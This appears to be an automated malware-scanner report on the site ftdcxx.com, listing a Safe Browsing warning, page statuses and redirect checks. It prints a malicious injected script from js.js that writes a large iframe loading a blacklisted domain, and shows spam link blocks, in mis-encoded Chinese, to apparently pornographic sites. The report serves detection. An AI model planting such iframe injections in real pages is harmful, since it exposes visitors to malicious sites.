Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ftdcxx.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ftdcxx.com/ | 200 OK Content-Length: 19208 Content-Type: text/html | clean |
http://ftdcxx.com/js.js | 200 OK Content-Length: 1115 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.riyu958.com document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.riyu958.com/></iframe>");
function browserRedirect() { var sUserAgent = navigator.userAgent.toLowerCase(); var bIsIpad = sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp = sUserAgent.match(/midp/i) == "midp"; var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; ...[527 bytes skipped]... Decoded script: <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.riyu958.com/></iframe> Malicious iFrame found. size: 100x2450 src: http://www.riyu958.com/ This URL is marked by Google as suspicious <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowtransparency src=http://www.riyu958.com/> | ||
http://ftdcxx.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://js.users.51.la/15651134.js | 200 OK Content-Length: 1981 Content-Type: application/x-javascript | clean |
http://ftdcxx.com/wys/ | 200 OK Content-Length: 4644 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.cessgo.com ...[3814 bytes skipped]... g" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.qbzjm.com/rrl/" title="ÈÈÈÈߣ">ÈÈÈÈߣ</a><a href="http://www.cessgo.com/bsw/" title="²¥É«Íø">²¥É«Íø</a><a href="http://www.hhcqw.com/sycbb/" title="ÉîÒ¹²Ù±Æ±Æ">ÉîÒ¹²Ù±Æ±Æ</a><a href="http://www.hhcqw.com/aqy/" title="°³È¥Ò²">°³È¥Ò²</a><a href="http://hhcqw.com/xyqs/" title="У԰ÇéÉ«">У԰ÇéÉ«</a><a href="http://cessgo.com/4sb/" title="4É«²¥">4É«²¥</a><a href="http://www.qbzjm.com/crsp/" title="³ÉÈËÊÓƵ">³ÉÈËÊÓƵ</a><a href="http://qbzjm.com/kxwy/" title="¿ªÐÄÎåÔÂ">¿ªÐÄÎåÔÂ</a ...[1436 bytes skipped]... | ||
http://ftdcxx.com/sjd/ | 200 OK Content-Length: 4721 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.cessgo.com ...[4073 bytes skipped]... br/> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.czgcjx.com/llasw/" title="ÂÜÀò°®É«Íø">ÂÜÀò°®É«Íø</a><a href="http://www.fuyidz.com/mzszh/" title="ÃÃ×ÓÉ«×ÛºÏ">ÃÃ×ÓÉ«×ÛºÏ</a><a href="http://www.czgcjx.com/rrl/" title="ÈÈÈÈߣ">ÈÈÈÈߣ</a><a href="http://czgcjx.com/eel/" title="àÅàÅߣ">àÅàÅߣ</a><a href="http://www.cessgo.com/crg/" title="³ÉÈ˸ó">³ÉÈ˸ó</a><a href="http://qbzjm.com/syh/" title="É«ÓÕ»ó">É«ÓÕ»ó</a><a href="http://www.hhcqw.com/jqgjqw/" title="¾ÍÈ¥¸É¾ÍÈ¥ÎÇ">¾ÍÈ¥¸É¾ÍÈ¥ÎÇ</a><a href="http://www.hhcqw.com/yyys/" title="ÒÀÒÀÓ°ÊÓ">ÒÀÒÀÓ°ÊÓ</a><a href="http://ftdcxx.com/whs/" title="ÎÒºÃÉ«">ÎÒºÃÉ«</a><a href="http://www.cessgo.com/ztsq/" title="ÕýÌ«ÉçÇø">ÕýÌ«ÉçÇø</a><a href="http://www.gdtufu.com/mncwwc/" title="ÃÀÅ®²ÙÎÒÎÒ²Ù ...[1254 bytes skipped]... | ||
http://ftdcxx.com/nsavw/ | 200 OK Content-Length: 4789 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gdtufu.com ...[3976 bytes skipped]... /> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://ftdcxx.com/ztl/" title="Õ¨Ììߣ">Õ¨Ììߣ</a><a href="http://www.ftdcxx.com/thszhz/" title="ÌÒ»¨É«×ÛºÏÕ¾">ÌÒ»¨É«×ÛºÏÕ¾</a><a href="http://gdtufu.com/88xoxo/" title="88XOXO">88XOXO</a><a href="http://www.hhcqw.com/twlxxzxylw/" title="̨ÍåÀÐÐÝÏÐÖÐÐÔÓéÀÖÍø">̨ÍåÀÐÐÝÏÐÖÐÐÔÓéÀÖÍø</a><a href="http://www.frdict.com/xsgqm/" title="Сɫ¸çÆæÃ×">Сɫ¸çÆæÃ×</a><a href="http://hhcqw.com/yal/" title="Ò¯°®ß£">Ò¯°®ß£</a><a href="http://hhcqw.com/dysqjd/" title="µÚһɫÇé»ùµØ">µÚһɫÇé»ùµØ</a><a href="http://frdict.com/acmm/" title="°®²ÙÃÃÃÃ">°®²ÙÃÃÃÃ</a><a href="http://www.fr ...[1419 bytes skipped]... | ||
http://ftdcxx.com/dssk/ | 200 OK Content-Length: 4689 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hhcqw.com ...[4075 bytes skipped]... ="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://frdict.com/thszh/" title="ÌÒ»¨É«×ÛºÏ">ÌÒ»¨É«×ÛºÏ</a><a href="http://fuyidz.com/lq/" title="ÂÒÇå">ÂÒÇå</a><a href="http://fuyidz.com/eel/" title="¶î¶ûߣ">¶î¶ûߣ</a><a href="http://www.ftdcxx.com/ggs/" title="¸ç¸çÉä">¸ç¸çÉä</a><a href="http://hhcqw.com/hgsjdy/" title="º«¹úÈý¼¶µçÓ°">º«¹úÈý¼¶µçÓ°</a><a href="http://qbzjm.com/jqst/" title="¼¤Çéɫͼ">¼¤Çéɫͼ</a><a href="http://cessgo.com/xywysq/" title="åÐÒ£ÎåÔÂÉçÇø">åÐÒ£ÎåÔÂÉçÇø</a><a href="http://gzhiec.com/mst/" title="ÂíÉ«ÌÃ">ÂíÉ«ÌÃ</a><a href="http://czgcjx.com/jqsdtt/" title="¼¤ÇéÉ«¶¯Ì¬Í¼">¼¤ÇéÉ«¶¯Ì¬Í¼</a><a href="http://qbzjm.com/jw/" title="½¿ÊÎÝ">½¿ÊÎÝ</a><a href="http://www.czgcjx.com/yzdyst/" title="Ñ ...[1221 bytes skipped]... | ||
http://ftdcxx.com/sgghmm/ | 200 OK Content-Length: 4724 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hhcqw.com ...[3813 bytes skipped]... 6.jpg" alt=""/><br /></li><li><img src="/pic/421.jpg" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://hhcqw.com/scltrs/" title="Ê®´ÎÀ²ÌÆÈËÉç">Ê®´ÎÀ²ÌÆÈËÉç</a><a href="http://www.gyshtgz.com/ybykxgl/" title="Ô½²¥Ô½¿ªÐĹ¥ÂÔ">Ô½²¥Ô½¿ªÐĹ¥ÂÔ</a><a href="http://qbzjm.com/gyys/" title="¸çҲҪɫ">¸çҲҪɫ</a><a href="http://www.czgcjx.com/jccrw/" title="¾Í²Ù³ÉÈËÍø">¾Í²Ù³ÉÈËÍø</a><a href="http://ftdcxx.com/crjswz/" title="³ÉÈ˾ÆÉ«ÍøÕ¾">³ÉÈ˾ÆÉ«ÍøÕ¾</a><a href="http://cessgo.com/xsg/" title="Сɫ¹·">Сɫ¹·</a><a href="http://gdtufu ...[1518 bytes skipped]... | ||
http://ftdcxx.com/mzl/ | 200 OK Content-Length: 4679 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.gdtufu.com ...[3774 bytes skipped]... ><br /></li><li><img src="/pic/1379970891_9238.jpg" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.gdtufu.com/rbsjp/" title="ÈÕ±¾Èý¼¶Æ¬">ÈÕ±¾Èý¼¶Æ¬</a><a href="http://www.hhcqw.com/lpp/" title="ߣƮƮ">ߣƮƮ</a><a href="http://www.gyshtgz.com/skbdysp/" title="É«¿ì²¥µçÓ°ÊÓƵ">É«¿ì²¥µçÓ°ÊÓƵ</a><a href="http://qbzjm.com/hxg/" title="»¨Ðĸç">»¨Ðĸç</a><a href="http://www.cessgo.com/srg/" title="É«È˸ñ">É«È˸ñ</a><a href="http://cessgo.com/ccw/" title="²å²åÍø">²å²åÍø</a><a href="http://fuyidz.com/sbwdy/" title="É«°ÉÍøµçÓ° ...[1511 bytes skipped]... | ||
http://ftdcxx.com/wytmm/ | 200 OK Content-Length: 4748 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gzhiec.com ...[3783 bytes skipped]... "/><br /></li><li><img src="/pic/1362301667_5724.jpg" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://gzhiec.com/lsq/" title="ÁñÉçÇø">ÁñÉçÇø</a><a href="http://cessgo.com/eqlyy/" title="¶îȥߣӰԺ">¶îȥߣӰԺ</a><a href="http://gyshtgz.com/hkdsjp/" title="ºÃ¿´µÄÈý¼¶Æ¬">ºÃ¿´µÄÈý¼¶Æ¬</a><a href="http://gyshtgz.com/mncbt/" title="ÃÍÄвٱÆͼ">ÃÍÄвٱÆͼ</a><a href="http://czgcjx.com/djyy/" title="´ó½ãÓ°Ôº">´ó½ãÓ°Ôº</a><a href="http://www.cessgo.com/sljzy/" title="ɬÀǼ¯ÖÐÒù">ɬÀǼ¯ÖÐÒù</a><a href="http://www.czgcjx.com/kxsbw/" ...[1571 bytes skipped]... | ||
http://ftdcxx.com/ttl1/ | 200 OK Content-Length: 4680 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hhcqw.com ...[3763 bytes skipped]... .jpg" alt=""/><br /></li><li><img src="/pic/85.jpg" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.hhcqw.com/gyszww/" title="¸çҲɫÖÐÎÄÍø">¸çҲɫÖÐÎÄÍø</a><a href="http://www.fuyidz.com/lhd/" title="ߣºÅµê">ߣºÅµê</a><a href="http://ftdcxx.com/xapwz/" title="ÐÔ°®Æ¬ÍøÕ¾">ÐÔ°®Æ¬ÍøÕ¾</a><a href="http://www.gyshtgz.com/wysw/" title="ÎÒҪɫÍø">ÎÒҪɫÍø</a><a href="http://www.hhcqw.com/nsxxw/" title="ŮɫxxÍø">ŮɫxxÍø</a><a href="http://ftdcxx.com/sjyy/" title="Èý¼¶Ó°Ôº">Èý¼¶Ó°Ôº</a><a href="http://fuyidz.com/kxsbwt/" titl ...[1524 bytes skipped]... | ||
http://ftdcxx.com/ell/ | 200 OK Content-Length: 4698 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: cessgo.com ...[3822 bytes skipped]... ""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.fuyidz.com/x77lt/" title="С7.7ÂÛ̳">С7.7ÂÛ̳</a><a href="http://cessgo.com/szs/" title="Ë®ÖÐÉ«">Ë®ÖÐÉ«</a><a href="http://www.hhcqw.com/youjizzkbl/" title="youjizz¿´²»ÁË">youjizz¿´²»ÁË</a><a href="http://www.frdict.com/clsqyqm/" title="²ÝÁñÉçÇøÑûÇëÂë">²ÝÁñÉçÇøÑûÇëÂë</a><a href="http://cessgo.com/tyky/" title="ÌÒÔË¿ñÒ½">ÌÒÔË¿ñÒ½</a><a href="http://www.gzhiec.com/djrbdy/" title="¶«¾©ÈȲ¥µçÓ°">¶«¾©ÈȲ¥µçÓ°</a><a href="http://fuyidz.com/ltt/" title="ߣ̤̤">ߣ̤̤</a><a href="http://www.gdt ...[1482 bytes skipped]... | ||
http://ftdcxx.com/cbw/ | 200 OK Content-Length: 4698 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.gzhiec.com ...[3787 bytes skipped]... ><br /></li><li><img src="/pic/1366983482_4287.jpg" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.gzhiec.com/crsp/" title="³ÉÈËÊÓƵ">³ÉÈËÊÓƵ</a><a href="http://www.hhcqw.com/sbttsq/" title="É«²¥æÃæÃÉçÇø">É«²¥æÃæÃÉçÇø</a><a href="http://www.fuyidz.com/rblscl/" title="ÈÕ±¾ß£Ê®´ÎÀ²">ÈÕ±¾ß£Ê®´ÎÀ²</a><a href="http://gzhiec.com/lll/" title="ߣߣߣ">ߣߣߣ</a><a href="http://www.hhcqw.com/rjl/" title="ÈÕ¼Óߣ">ÈÕ¼Óߣ</a><a href="http://ftdcxx.com/omsjp/" title="Å·ÃÀÈý¼¶Æ¬">Å·ÃÀÈý¼¶Æ¬</a><a href="http://ftdcxx.com/qqs/" title ...[1517 bytes skipped]... | ||
http://ftdcxx.com/sts/ | 200 OK Content-Length: 4722 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.gdtufu.com ...[3850 bytes skipped]... ></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.czgcjx.com/mt95lgtt/" title="ÃÛÌÒ95ߣ¹ÜÌìÌÃ">ÃÛÌÒ95ߣ¹ÜÌìÌÃ</a><a href="http://www.gdtufu.com/lqhh/" title="ÁúÆðºé»Ä">ÁúÆðºé»Ä</a><a href="http://frdict.com/dysjp/" title="µçÓ°Èý¼¶Æ¬">µçÓ°Èý¼¶Æ¬</a><a href="http://fuyidz.com/sgys/" title="É«¹·Ó°ÊÓ">É«¹·Ó°ÊÓ</a><a href="http://www.fuyidz.com/kxwyjqsa/" title="¿ªÐÄÎåÔ ¼¤ÇéÉî°®">¿ªÐÄÎåÔ ¼¤ÇéÉî°®</a><a href="http://frdict.com/wyss/" title="ÎåÔÂÉ«É«">ÎåÔÂÉ«É«</a><a href="http://hhcqw.com/ttltp/" title="͵͵ߣͼƬ">͵͵ߣͼƬ</a><a href="http://www.cessgo.c ...[1478 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ftdcxx.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 18 Jan 2015 14:51:46 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: ftdcxx.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 18 Jan 2015 14:51:46 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: ftdcxx.com
Referer: http://www.google.com/search?q=ftdcxx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ftdcxx.com
Referer: http://www.google.com/search?q=ftdcxx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.